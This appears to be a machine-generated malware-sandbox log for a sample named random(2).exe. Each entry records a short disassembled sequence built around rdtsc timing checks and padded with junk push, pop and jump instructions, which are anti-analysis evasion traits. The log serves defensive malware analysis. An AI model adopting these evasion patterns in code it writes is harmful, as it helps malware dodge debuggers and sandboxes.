              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 646C3E second address: 646C48 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29453582E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 646F5C second address: 646F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 646F60 second address: 646F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 646F64 second address: 646F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 646F6A second address: 646F8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E8h 0x00000007 pushad 0x00000008 je 00007F29453582D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 646F8D second address: 646F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64720C second address: 647212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 647212 second address: 647221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push edi 0x00000007 jnp 00007F2944535553h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64828A second address: 648290 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 648290 second address: 64829B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F2944535536h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64829B second address: 6482A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6482A8 second address: 6482AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6482AC second address: 6482BF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29453582D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6482BF second address: 6482C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6482C7 second address: 6482CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6482CC second address: 6482D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F2944535536h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6482D9 second address: 6482E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F29453582D6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6485A4 second address: 6485A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6485A8 second address: 6485AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64D720 second address: 64D728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64D728 second address: 64D742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582DFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64D742 second address: 64D756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2944535540h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64D756 second address: 64D79A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E8h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F29453582D8h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jl 00007F29453582FBh 0x0000001a jmp 00007F29453582E3h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64D79A second address: 64D79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64CC1C second address: 64CC21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64CFF9 second address: 64D016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535546h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64D172 second address: 64D189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582E3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64D464 second address: 64D468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 59D9A3 second address: 59D9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65A656 second address: 65A66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F294453553Ch 0x0000000b jbe 00007F294453553Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65AA01 second address: 65AA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 js 00007F29453582D6h 0x0000000c jg 00007F29453582D6h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65AA14 second address: 65AA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F2944535536h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c ja 00007F294453553Eh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 jmp 00007F294453553Eh 0x0000001c jmp 00007F294453553Eh 0x00000021 pop ecx 0x00000022 jns 00007F2944535542h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65AA62 second address: 65AA68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65AEC2 second address: 65AEC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65AEC8 second address: 65AECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65AFF2 second address: 65AFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65B1A5 second address: 65B1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65C1F2 second address: 65C1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65A079 second address: 65A07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65A07F second address: 65A083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65A083 second address: 65A0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F29453582DBh 0x0000000e jmp 00007F29453582E1h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65E880 second address: 65E886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65E886 second address: 65E894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F29453582DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65E894 second address: 65E898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6613D0 second address: 6613E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582DFh 0x00000009 jc 00007F29453582D6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6613E9 second address: 661409 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535548h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 661409 second address: 661417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582DAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 666368 second address: 666395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F294453553Ah 0x00000009 pop esi 0x0000000a jmp 00007F2944535549h 0x0000000f popad 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 666395 second address: 6663B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582E4h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 670320 second address: 670324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 674939 second address: 674948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F29453582D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 674698 second address: 6746B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2944535546h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 677654 second address: 67765A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 677014 second address: 67702F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535547h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 67702F second address: 677039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 677039 second address: 67703D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 67703D second address: 677043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 68503B second address: 685052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2944535543h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 68668B second address: 68668F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 68668F second address: 686695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 686695 second address: 68669F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29453582D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 68669F second address: 6866A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 68939A second address: 6893A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6893A0 second address: 6893A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 689242 second address: 689249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 690470 second address: 69047A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6905DD second address: 6905E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6905E3 second address: 6905F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F294453553Dh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6905F6 second address: 6905FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6905FC second address: 690619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F2944535543h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 690619 second address: 69061F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 690765 second address: 69076F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2944535536h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 69076F second address: 690790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F29453582DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 697F29 second address: 697F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 697F2D second address: 697F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 69ABAF second address: 69ABB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 69A8BD second address: 69A8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 69A8C8 second address: 69A8D7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2944535536h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6A695C second address: 6A697A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F29453582E9h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 596DCD second address: 596DD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 596DD3 second address: 596DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F29453582D6h 0x0000000d jnl 00007F29453582D6h 0x00000013 jmp 00007F29453582E6h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 596DFD second address: 596E0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6A67FE second address: 6A6818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F29453582D6h 0x0000000e jl 00007F29453582D6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6A6818 second address: 6A681E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6A681E second address: 6A683B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F29453582D6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29453582DDh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6A683B second address: 6A6841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 591C4C second address: 591C53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 591C53 second address: 591C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6B980B second address: 6B9814 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C485F second address: 6C487E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2944535536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2944535545h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C36E1 second address: 6C36E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C3B23 second address: 6C3B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C3B27 second address: 6C3B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C3B2B second address: 6C3B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C3B35 second address: 6C3B41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007F29453582D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C3F9C second address: 6C3FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C3FA0 second address: 6C3FB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C40EF second address: 6C4113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007F2944535549h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4113 second address: 6C4119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4240 second address: 6C4245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4245 second address: 6C4251 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29453582DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4504 second address: 6C4508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4508 second address: 6C4538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F29453582DCh 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4538 second address: 6C4552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2944535536h 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c jl 00007F2944535536h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push esi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4552 second address: 6C4563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F29453582D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
